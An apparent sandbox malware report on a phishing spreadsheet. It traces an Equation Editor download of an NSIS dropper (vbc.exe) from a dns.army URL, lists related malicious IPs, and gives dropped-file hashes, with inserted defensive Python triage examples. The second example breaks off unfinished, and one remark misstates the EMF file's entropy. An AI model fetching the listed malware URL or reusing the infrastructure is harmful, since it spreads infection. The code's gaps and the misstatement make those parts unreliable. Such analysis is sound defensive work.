                                                                                                                                                                • 181.214.121.98
                                                                                                                                                                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNMV ASIA EMERALD II.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.120
                                                                                                                                                                TRANSIT MANIFEST CARGO FORM.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.133.108.6
                                                                                                                                                                SKBMT_ 5870Z904_ Image.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                ORDER LIST.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.149
                                                                                                                                                                FedEx Shipment 427781339903.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.151.123.132
                                                                                                                                                                BL + PL + CI.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                Our New Order Feb 23 2021 at 2.70_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                Request for Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                #U007einvoice#U007eSC00978656.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                quote.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.89.88.238
                                                                                                                                                                Our New Order Feb 22 2021 at 2.30_PVV440_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                • 103.114.107.184
                                                                                                                                                                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.128
                                                                                                                                                                quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.140.251.164
                                                                                                                                                                notice of arrival.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.147.184.10
                                                                                                                                                                22-2-2021 .xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.118
                                                                                                                                                                Shipping_Document.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.119
                                                                                                                                                                Remittance copy.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.99.1.145
                                                                                                                                                                CI + PL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.121
                                                                                                                                                                RFQ_Enquiry_0002379_.xlsxGet hashmaliciousBrowse
                                                                                                                                                                • 103.141.138.117

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll
Associated Sample Name / URL (Detection):
• lpdKSOB78u.exe (malicious)
• jTmBvrBw7V.exe (malicious)
• 523JHfbGM1.exe (malicious)
• TAk8jeG5ob.exe (malicious)
• PAYMENT COPY.exe (malicious)
• ORDER LIST.xlsx (malicious)
• Orderoffer.exe (malicious)
• Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe (malicious)
• INV_PR2201.docm (malicious)
• CV-JOB REQUEST______PDF.EXE (malicious)
• Request for Quotation.exe (malicious)
• #U007einvoice#U007eSC00978656.xlsx (malicious)
• Purchase Order___pdf ____________.exe (malicious)
• quote.exe (malicious)
• Order83930.exe (malicious)
• Invoice 6500TH21Y5674.exe (malicious)
• Invoice 6500TH21Y5674.exe (malicious)
• GPP.exe (malicious)
• OrderSuppliesQuote0817916.exe (malicious)
• ACCOUNT DETAILS.exe (malicious)

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winlog[1]
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: downloaded
Size (bytes): 217624
Entropy (8bit): 7.895818449493941
Encrypted: false
SSDEEP: 6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
MD5: 2915C0AFB0B6B26A5A699965D2119F7A
SHA1: 32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
SHA-256: 38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
SHA-512: B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 36%
Reputation: low
IE Cache URL: http://algreenstdykeghestqw.dns.army/receipat/winlog.exe?platform=hootsuite

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CFA2F95.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category: dropped
Size (bytes): 48770
Entropy (8bit): 7.801842363879827
Encrypted: false
SSDEEP: 768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5: AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1: 200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256: 56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512: A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
Malicious: false
Reputation: moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D657FE6.png
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 111378
Entropy (8bit): 7.963743447431302
Encrypted: false
SSDEEP: 3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
MD5: 5ACDB72AF63832D23CED937B6B976471
SHA1: BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
SHA-256: 6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
SHA-512: FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
Malicious: false
Reputation: moderate, very likely benign file

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC9322AF.jpeg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
Category: dropped
Size (bytes): 48770
Entropy (8bit): 7.801842363879827
Encrypted: false
SSDEEP: 768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
MD5: AA7A56E6A97FFA9390DA10A2EC0C5805
SHA1: 200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
SHA-256: 56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
SHA-512: A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6617CE4.png
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):111378
                                                                                                                                                                                                        Entropy (8bit):7.963743447431302
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:AE34q7rqNP36BuuQOlx2UXdx+yx9uWqFOp:b3brGP3lujnd3Fx9Pqgp
                                                                                                                                                                                                        MD5:5ACDB72AF63832D23CED937B6B976471
                                                                                                                                                                                                        SHA1:BC754ECEF3BEC86C6AFCC1AF644190AAFC34D9B7
                                                                                                                                                                                                        SHA-256:6D73F61D9E2A5E01DEE491E4E1F8600E0409879B86DB69B193CCF31CFD517DF3
                                                                                                                                                                                                        SHA-512:FAE05526AA18F0EC0725C089A9252FEE54C995FC5D9C4590EC9DB2B0B6192AB6BD3C6CECF5703E235536433C2DAB5C0356FE95657FE9B14574C8F13320774D23
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview: .PNG........IHDR.............b..v....sRGB.........gAMA......a.....pHYs..........+......IDATx^..|g.U.4.G...#..A....*.......>.i .....E..._.........R.....& A.).`Q'r`...%.22q.R..0...v.. .a..c....s..g.s...1.I..;......Z{..^..>..................E..8.................. C.@..@..@..@..@.!...... .. .. .. ..p... .. .. .. .. .'..24..@..@..@..@...A................"................h$...FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H..r#"\.. .. .. .. p...A>L.F_A..@..@..@.....AnD..@..@..@..@.....8.I..+...........@#.8..p.............a"...0I.}............h$..................8L.. .&i.. .. .. .. ..... 7".. .. .. .. ........$m...@..@..@..@.....FD...@..@..@..@.0...|................4...................&.p.....W............F.p..................D...a.6... .. .. .. .H`...p...............p...|.n|.5.....4... .. .. .. .O.... ... .. .. .. ......+p.....?...............\...r.^...@..@..@..@.........0... .. .. .. ..eD.[... .. .. .
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E1722339.emf
                                                                                                                                                                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):653280
                                                                                                                                                                                                        Entropy (8bit):2.8986377906498118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:634UL0tS6WB0JOqFVY5QcARI/McGdAT9kRLFdtSyUu50yknG/qc+x:04UcLe0JOqQQZR8MDdATCR3tS+jqcC
                                                                                                                                                                                                        MD5:A49BEB715E475DD3C32F25ED71346D54
                                                                                                                                                                                                        SHA1:1A455F9E7C1D969A119EE77FEEA4904D62C217BE
                                                                                                                                                                                                        SHA-256:58965E7DDEF9329510DD2E62A3DE60DEB484C897A0152EDF311E6FA01347D599
                                                                                                                                                                                                        SHA-512:8AB6D1FCF71C415245F3608C071A05063D3F7FC87BC378D98DCE9F6EA71ECD334FE60BC77BA358F3E1913B90F70D52E8973B9D90934C07316134285A0F1A20E7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: ....l...........S................@...#.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I...c...%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................P........N.WP...H...........4....N.WP...H... ....y.RH...P... ............z.R............................................X...%...7...................{ .@................C.a.l.i.b.r.................X...H...|....2.Q.................{.Q............dv......%...........%...........%...........!.......................I...c..."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I...c...P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsgE449.tmp
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):191404
                                                                                                                                                                                                        Entropy (8bit):7.878606044995474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:2ojw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAWXNt:2ogstrYBJ9Dy3SFSxuPmWrt
                                                                                                                                                                                                        MD5:4FECDED6A29355A90A3D3B3AABBB16E4
                                                                                                                                                                                                        SHA1:F0F16D89E8D1DD35F088CB49298DEA74A3FFF53B
                                                                                                                                                                                                        SHA-256:29680AD46B1D8A090A403798300D02897B547CF3F87FE44ADA08D95C7D34406B
                                                                                                                                                                                                        SHA-512:03889A1FA29D924FD5EB1C293A8D62FAF78876EC5CCF90F7602DC92302DB1D06BC162BDE097A66E9D148C90D0B7920E539CED3D0EF3A9AB4DD230AA73DE7EC7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: ........,...................$...............................................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11776
                                                                                                                                                                                                        Entropy (8bit):5.855045165595541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                                                                                                                        MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                                                                                                                        SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                                                                                                                        SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                                                                                                                        SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                                                                                                                        Malicious:false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: lpdKSOB78u.exe, Detection: malicious
• Filename: jTmBvrBw7V.exe, Detection: malicious
• Filename: 523JHfbGM1.exe, Detection: malicious
• Filename: TAk8jeG5ob.exe, Detection: malicious
• Filename: PAYMENT COPY.exe, Detection: malicious
• Filename: ORDER LIST.xlsx, Detection: malicious
• Filename: Orderoffer.exe, Detection: malicious
• Filename: Our New Order Feb 23 2021 at 2.30_PVV440_PDF.exe, Detection: malicious
• Filename: INV_PR2201.docm, Detection: malicious
• Filename: CV-JOB REQUEST______PDF.EXE, Detection: malicious
• Filename: Request for Quotation.exe, Detection: malicious
• Filename: #U007einvoice#U007eSC00978656.xlsx, Detection: malicious
• Filename: Purchase Order___pdf ____________.exe, Detection: malicious
• Filename: quote.exe, Detection: malicious
• Filename: Order83930.exe, Detection: malicious
• Filename: Invoice 6500TH21Y5674.exe, Detection: malicious
• Filename: GPP.exe, Detection: malicious
• Filename: OrderSuppliesQuote0817916.exe, Detection: malicious
• Filename: ACCOUNT DETAILS.exe, Detection: malicious
                                                                                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tjqth.zz
                                                                                                                                                                                                        Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):164352
                                                                                                                                                                                                        Entropy (8bit):7.998867839876064
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:ajw9jwLSvkpGlMfLPVlYB7kc8LvmDgJkIlSFmFp1Su/2PmLNxfYhAW2:agstrYBJ9Dy3SFSxuPmWo
                                                                                                                                                                                                        MD5:D0AA54167E81FD8C6C7CBC832E178855
                                                                                                                                                                                                        SHA1:7DEB6EB916CCDB8BDF62214F2F3026E9758CBCF6
                                                                                                                                                                                                        SHA-256:C8FD43535A87747A5046D1096717E18CE1E67D1B428498C072F011F3FA9A21E0
                                                                                                                                                                                                        SHA-512:380D39FA1D20BA78F13F91B3B5EA16B058BC864019C8608898941B723E9B04DFEAADDFAF041DC0D888388E056CA188978AEB3797A2C243313772AD83EB7FCFB7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: .......Z...~....m...r...~.k.O...Sq....T.E..X.zT..y.*r.{.....s2=...t7^...a.?Gb.4k.).l4e.d.........X.?AO..*.[....].}....0..........j~v...Q.D!A.wA......W.C..@{y...s.#z}.......\x..#4..i.=)dO......#^$..s.._..G{.....8s(...q[..>.D.\U..W....{....6s.?i.:?.{.f.(.|......]..3...^(tS...+..o.N..Kn].,.. %.`.....M^.CRlj3.{.[..i.\-.....l.....+.:YD.....v.c.~[.....~...z.F._a.i/.g\.uF.l..G.D=......:...;...+.F..C...33.R3.[j=...%..G.a{P....KWu....L{...Zr.....6IE<..E&....H..j..;R......K...^}.....CO..v...'ov!..f$j....A...Uh.y.......8'...$.....'aSS.k57.(..}I...U......wL. ...-;....A..qXZ....)*8x.V...1...s....PM.(&j.w..a.R..Rx..<;e2.... ......K..V..c5.lD.eT.n../b..7P..S..I....K~.....K....I..._.p...,:.H.1...4.4.!...6.......?.x...N.*.;.....8..;.Op.u..]...\..B..4J....`.t".BEm.`\..2....;..C.).uV7...m...c...x9W.m#..T....@A2M..(..$S......l$b.8..........4'#..OM.%...\..F.d...|..v.`../x.......#.3.l....1XB.[s..>..g.bz....c.Ax.I.q;O..'. P.n.y..0...c...w9..'\....".s.....1
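The files written by C:\Users\Public\vbc.exe in this listing have the layout of an NSIS installer: System.dll unpacked into %TEMP%\ns<random>.tmp\ is the NSIS System plugin (the component NSIS scripts use to call arbitrary Win32 APIs), tjqth.zz is a 164352-byte blob whose entropy of 7.9989 bits per byte the report marks as Encrypted, and z9ayiyo.dll is a second PE32 DLL dropped into %TEMP%, while the images written by EXCEL.EXE are ordinary document content. The Python below is an added example, not part of the sandbox report or its vendor's logic. It recomputes the "Entropy (8bit)" figure (Shannon entropy over byte values) on constructed inputs and applies a few triage rules to records copied from this listing. The 7.99 cut-off for "encrypted", the flag names and the path patterns are the example's own assumptions; the report only shows that 7.9989 is flagged and 7.9637 is not.

```python
"""Triage of dropped-file records (added example, not sandbox vendor code)."""
from __future__ import annotations

import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0), i.e. the report's "Entropy (8bit)"."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def entropy_demo() -> Dict[str, float]:
    """Constructed inputs that show the scale: constant, two-symbol and uniform bytes."""
    return {
        "constant": shannon_entropy(b"\x00" * 4096),          # one symbol  -> 0.0
        "two_symbols": shannon_entropy(b"\x00\xff" * 2048),   # two symbols -> 1.0
        "uniform": shannon_entropy(bytes(range(256)) * 16),  # all 256     -> 8.0
    }


# Assumed cut-off. The report flags the 7.9989-entropy blob as Encrypted and the
# 7.9637-entropy PNG as not, so the real threshold lies between those values;
# 7.99 is this example's guess, not the vendor's number.
ENCRYPTED_THRESHOLD = 7.99

# NSIS unpacks plugins into %TEMP%\ns<letter><4 hex>.tmp\ (nsgE449.tmp, nsqE488.tmp above).
NSIS_PLUGIN_DIR = re.compile(r"\\Temp\\ns[a-z][0-9a-f]{4}\.tmp\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# A process image sitting directly in C:\Users\Public\ (the report's "user root").
USER_ROOT_PROCESS = re.compile(r"^C:\\Users\\Public\\[^\\]+$", re.IGNORECASE)


@dataclass(frozen=True)
class DroppedFile:
    path: str
    process: str
    file_type: str
    entropy: float


def triage(rec: DroppedFile) -> List[str]:
    """Return the assumed triage flags that apply to one dropped-file record."""
    flags: List[str] = []
    if rec.entropy >= ENCRYPTED_THRESHOLD:
        flags.append("high-entropy-payload")
    if rec.file_type.startswith("PE32") and TEMP_DIR.search(rec.path):
        flags.append("pe-dropped-in-temp")
    if NSIS_PLUGIN_DIR.search(rec.path) and rec.path.lower().endswith("\\system.dll"):
        flags.append("nsis-system-plugin")
    if USER_ROOT_PROCESS.match(rec.process):
        flags.append("dropper-runs-from-user-root")
    return flags


# Path, writing process, file type and entropy copied from the entries in this listing.
REPORT_RECORDS: Sequence[DroppedFile] = (
    DroppedFile(r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6617CE4.png",
                r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                "PNG image data, 712 x 712, 8-bit/color RGBA, non-interlaced", 7.963743447431302),
    DroppedFile(r"C:\Users\user\AppData\Local\Temp\nsqE488.tmp\System.dll",
                r"C:\Users\Public\vbc.exe",
                "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", 5.855045165595541),
    DroppedFile(r"C:\Users\user\AppData\Local\Temp\tjqth.zz",
                r"C:\Users\Public\vbc.exe", "data", 7.998867839876064),
    DroppedFile(r"C:\Users\user\AppData\Local\Temp\z9ayiyo.dll",
                r"C:\Users\Public\vbc.exe",
                "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows", 6.6898431043201),
)


def triage_report(records: Optional[Sequence[DroppedFile]] = None) -> Dict[str, List[str]]:
    """Map each record's file name to its flags; the PNG from Excel gets none."""
    recs = REPORT_RECORDS if records is None else records
    return {r.path.rsplit("\\", 1)[-1]: triage(r) for r in recs}


if __name__ == "__main__":
    for name, value in entropy_demo().items():
        print(f"{name:12s} {value:.4f}")
    for name, flags in triage_report().items():
        print(f"{name:14s} {', '.join(flags) or '-'}")
```

Entropy alone separates the encrypted blob from the DLLs here, but the EMF and JPEG show why it is not a verdict: compressed images sit close to 8.0 too, which is why the rules also look at who wrote the file and where.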

C:\Users\user\AppData\Local\Temp\z9ayiyo.dll
Process: C:\Users\Public\vbc.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11776
Entropy (8bit): 6.6898431043201
Encrypted: false
SSDEEP: 96:NEBgIVyWyVDSLUpyceXGkLF6HSFLdtyfJHxPVAcnuvmMeT8XfWJ1QhulooeUZi+w:qBnADSLwgXG7yFDixPVmxP4QPCrvLs3
MD5: 94A51F0839DE3A6F5069F766E7BDE4A7
SHA1: 19454F40631ACE4B3DE692C245E3F2551A6794D6
SHA-256: 2D78C0015CEC67CD072ACFB337075825D4A6866D5FAC1B497A649DEB2190F42C
SHA-512: 07468053EFD63FC4B404D87722E0E282B1C5C487CF97E6D858771B67B2574C90D62341FD96D3CFB94ACA6ED357E40657842ADD01E7C563AE170A65450A4EB75A
Malicious: false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............e.N.e.N.e.N.e.N.e.NI..N.e.N..cN.e.N..gN.e.N..dN.e.N..aN.e.NRich.e.N................PE..L...F.4`...........!.........&............... ...............................p............@.........................P$..I.... .......P.......................`..d.................................................... ...............................code............................... ....rdata....... ......................@..@.data........0......................@....rsrc........P.......*..............@..@.reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsx
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 330
Entropy (8bit): 1.4377382811115937
Encrypted: false
SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5: 96114D75E30EBD26B572C1FC83D1D02E
SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious: true
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe
Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category: dropped
Size (bytes): 217624
Entropy (8bit): 7.895818449493941
Encrypted: false
SSDEEP: 6144:611QTAGoul3imDxtHYB19DyzSFSxuPmxF0y:xAjul3i+xlK19JGuOUy
MD5: 2915C0AFB0B6B26A5A699965D2119F7A
SHA1: 32FDCC2E0BCFC476347078D7EA05F12D5A259BEA
SHA-256: 38B6A40D2EEDDF38695294C57971FC2EFAB81FEA95100260A2003BAA13616B83
SHA-512: B8312043058B28C0EEDE079425D785B581AABEAE63C889DDC4382FAA2B070333FC8A6E76F7810678CB9AE96B9E52D6E48604CEF9417C565C97C0FAADFE36B953
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 36%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...x.......4............@.......................................@.................................D...........|............................................................................................................text....e.......f.................. ..`.rdata...............j..............@..@.data...XU...........~..............@....ndata...................................rsrc...|...........................@..@................................................................................................................................................................................................................................................................................................................................................................
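The dropped-file records above carry the three facts an analyst weighs first: which process wrote the file, where it landed, and whether it is a PE at all. The following is an added example, not part of the Joe Sandbox report; it encodes those checks as triage rules and runs them over records constructed from the entries above (paths, writers, types, sizes and entropies as listed; the preview reduced to its leading bytes). The rule set, thresholds and severity labels are this example's own assumptions. It also recognises the `~$`-prefixed file as Excel's owner/lock file, which Excel writes beside every workbook it opens, so that the report's "Malicious: true" on it is not mistaken for a payload.

```python
"""Triage rules for a sandbox report's dropped-file records.

Added example (not part of the report or of Joe Sandbox). The records are
constructed from the fields the report shows; the rules encode the checks an
analyst does by hand: who wrote the file, where it landed, whether it is a
PE, and whether it is just Excel's owner/lock file.
"""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class DroppedFile:
    path: str
    process: str      # the process that wrote the file
    file_type: str    # libmagic-style description from the report
    size: int
    entropy: float
    magic: bytes      # first bytes of the file as the report's preview shows them
    flagged: bool     # the report's own "Malicious" verdict


# Constructed from the report's dropped-file entries above.
RECORDS = [
    DroppedFile(r"C:\Users\user\AppData\Local\Temp\z9ayiyo.dll",
                r"C:\Users\Public\vbc.exe",
                "PE32 executable (DLL) (GUI) Intel 80386, for MS Windows",
                11776, 6.69, b"MZ", False),
    DroppedFile(r"C:\Users\user\Desktop\~$QTN3C2AF414EDF9_041873.xlsx",
                r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
                "data", 330, 1.44, b"", True),   # preview shows no MZ header
    DroppedFile(r"C:\Users\Public\vbc.exe",
                r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "PE32 executable (GUI) Intel 80386, for MS Windows, "
                "Nullsoft Installer self-extracting archive",
                217624, 7.90, b"MZ", True),
]

# Office hosts that have no legitimate reason to write executables. EQNEDT32.EXE
# is the Equation Editor OLE server abused by CVE-2017-11882 / CVE-2018-0802.
OFFICE_HOSTS = {"EQNEDT32.EXE", "EXCEL.EXE", "WINWORD.EXE", "POWERPNT.EXE"}

# User- or world-writable directories droppers favour for staging (assumed list).
STAGING_DIRS = (r"c:\users\public", r"\appdata\local\temp")


def is_pe(rec: DroppedFile) -> bool:
    return rec.magic.startswith(b"MZ") or rec.file_type.startswith("PE32")


def is_office_owner_file(rec: DroppedFile) -> bool:
    """Excel (and Word) write a small '~$<name>' owner file holding the user
    name next to every document they open. It is a side effect, not a payload."""
    writer = ntpath.basename(rec.process).upper()
    return (ntpath.basename(rec.path).startswith("~$") and writer in OFFICE_HOSTS
            and rec.size < 4096 and not is_pe(rec))


def triage(rec: DroppedFile, records) -> tuple:
    """Return (severity, reasons) for one record, judged against all records."""
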